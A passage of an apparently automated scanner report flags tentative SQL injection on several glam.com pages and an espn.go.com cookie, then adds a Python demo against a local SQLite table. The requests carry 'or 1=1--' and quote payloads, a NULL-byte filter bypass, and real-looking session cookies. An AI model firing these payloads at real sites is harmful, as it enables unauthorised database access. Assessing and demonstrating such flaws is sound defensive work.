                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbsp;</d
...[SNIP]...

1.5. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beauty.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 18548129%20or%201%3d1--%20 and 18548129%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118548129%20or%201%3d1--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:36:40 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 20937
X-Varnish: 303280805
Expires: Thu, 21 Apr 2011 01:36:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:36:44 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' style='color:white' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();' >Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li 
class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover=
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=118548129%20or%201%3d2--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:36:46 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2312
X-Varnish: 303280937
Expires: Thu, 21 Apr 2011 01:36:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:36:46 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://hair.glam.com/' title='Hair'>Hair</a></li><li class=''><a href='http://makeup.glam.com/' title='Makeup'>Makeup</a></li><li class=''><a href='http://skinbody.glam.com/' title='Skin &amp; Body'>Skin &amp; Body</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a>
...[SNIP]...

1.6. http://blacklife.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blacklife.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 83827907%20or%201%3d1--%20 and 83827907%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183827907%20or%201%3d1--%20 HTTP/1.1
Host: blacklife.glam.com
Proxy-Connection: keep-alive
Referer: http://blacklife.glam.com/2011/04/20/found-it-beyonces-silk-floral-frock-and-snakeskin-shoes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:35:30 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 20966
X-Varnish: 303278592
Expires: Thu, 21 Apr 2011 01:35:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:35:32 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onm
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=183827907%20or%201%3d2--%20 HTTP/1.1
Host: blacklife.glam.com
Proxy-Connection: keep-alive
Referer: http://blacklife.glam.com/2011/04/20/found-it-beyonces-silk-floral-frock-and-snakeskin-shoes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:35:34 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2383
X-Varnish: 303278692
Expires: Thu, 21 Apr 2011 01:35:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:35:34 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://face.glam.com/' title='Face &amp; Style'>Face &amp; Style</a></li><li class=''><a href='http://scoop.glam.com/' title='Scoop &amp; Celebrity'>Scoop &amp; Celebrity</a></li><li class=''><a href='http://culture.glam.com/' title='Culture &amp; Lifestyle'>Culture &amp; Lifestyle</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a 
href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_bl
...[SNIP]...

1.7. http://brsseavideo-ak.espn.go.com/motion/ [userAB cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://brsseavideo-ak.espn.go.com
Path:   /motion/

Issue detail

The userAB cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userAB cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Caveat for this finding: in the requests below both probes carry the NULL byte (userAB=F%00' and userAB=F%00''), and both were refused with HTTP 403 by the Apache front end. The single-quote probe returned Apache's default Forbidden page (328 bytes, itself reporting a 404 while handling the ErrorDocument); the double-quote probe returned a 403 with an empty body. Neither is a database error message, so the "error disappeared" inference rests on a difference in error-page rendering rather than on query behaviour. Treat the issue as unconfirmed until a response that reflects SQL syntax handling is obtained.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /motion/ HTTP/1.1
Host: brsseavideo-ak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F%00'; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 1

HTTP/1.1 403 Forbidden
Server: Apache
Content-Length: 328
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 23:12:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /motion/
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /motion/ HTTP/1.1
Host: brsseavideo-ak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F%00''; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 2

HTTP/1.1 403 Forbidden
Server: Apache
Accept-Ranges: bytes
Content-Length: 0
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 23:12:06 GMT
Connection: close


1.8. http://celebrities.glam.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://celebrities.glam.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 48738779%20or%201%3d1--%20 and 48738779%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the responses below both requests returned HTTP 200 with the full category page; they were served by different back-end servers (backend-server: app135 and app136) and embed a per-request Disqus remote_auth_s2 token, so the 124-byte difference in Content-Length (70511 against 70635) is consistent with ordinary page variance and is not by itself evidence that the parameter name reaches a query.

Request 1

GET /?148738779%20or%201%3d1--%20=1 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 70511
X-Varnish: 303280709
Expires: Thu, 21 Apr 2011 01:36:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:36:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+7e66936e3f1c62370e64a85712b4dc4074daf5eb+1303349796"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="archive category category-celebrities" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbs
...[SNIP]...

Request 2

GET /?148738779%20or%201%3d2--%20=1 HTTP/1.1
Host: celebrities.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
X-Pingback: http://www.glam.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
backend-server: app136
Content-Length: 70635
X-Varnish: 1132209538
Expires: Thu, 21 Apr 2011 01:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+563e00d34ef8bfca8a6749983704aa539637e967+1303349805"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="archive category category-celebrities" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbs
...[SNIP]...

1.9. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://celebrities.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 68855159%20or%201%3d1--%20 and 68855159%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this case the two responses differ in content, not only in size: the 1=1 variant (20918 bytes) renders the full top navigation, while the 1=2 variant (2293 bytes) renders an empty <ul class='topnav'></ul>, the all-or-nothing pattern expected if the payload is changing the WHERE clause of the menu lookup. Confirm manually by comparing both against the unmodified request, and by sending the original value followed by and 1=1 and then and 1=2: the first should reproduce the unmodified response and the second an empty one.
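Added example, not part of this scan report or of any of the scanned applications: the script below reproduces, against an in-memory SQLite table, the three inference techniques the issue details rely on. These are the single-quote / double-quote error check (1.7, and again in 1.10 through 1.13 below), the "or 1=1-- " / "or 1=2-- " differential check (1.8 and 1.9), and the NULL-byte bypass of a native-code filter described in the 1.7 remediation detail. The table, the two query shapes, the filter and the application's handling of the NUL byte are constructed assumptions; the payload values are the ones that appear in the requests.

```python
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed stand-in for the table behind a menu lookup (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menus (id INTEGER, label TEXT)")
    conn.executemany("INSERT INTO menus VALUES (?, ?)",
                     [(1, "Home"), (2, "Fashion"), (3, "Beauty")])
    return conn


def vulnerable_lookup(conn, menu):
    """Assumed vulnerable shape: the numeric parameter is concatenated into SQL."""
    sql = "SELECT label FROM menus WHERE id = " + menu
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, menu):
    """Hardened form: the parameter is bound, so it is data, never SQL syntax."""
    sql = "SELECT label FROM menus WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (menu,))]


def quote_probe(conn, value):
    """Error-based check (1.7, 1.10-1.13): a lone ' breaks a quoted string and
    raises a syntax error; '' is an escaped quote and leaves the statement valid."""
    sql = "SELECT label FROM menus WHERE label = '" + value + "'"
    try:
        conn.execute(sql).fetchall()
        return "ok"
    except sqlite3.OperationalError:
        return "error"


def differential_probe(conn, lookup, base):
    """Boolean check (1.8, 1.9): append 'or 1=1-- ' and 'or 1=2-- ' to the
    original value; an injectable query returns different row sets."""
    true_rows = lookup(conn, base + " or 1=1-- ")
    false_rows = lookup(conn, base + " or 1=2-- ")
    return true_rows != false_rows


def native_filter_allows(raw):
    """Simulated native-code WAF (1.7 remediation detail, assumption): the value
    is handled as a C string, so inspection stops at the first NUL byte."""
    visible = raw.split("\x00", 1)[0]
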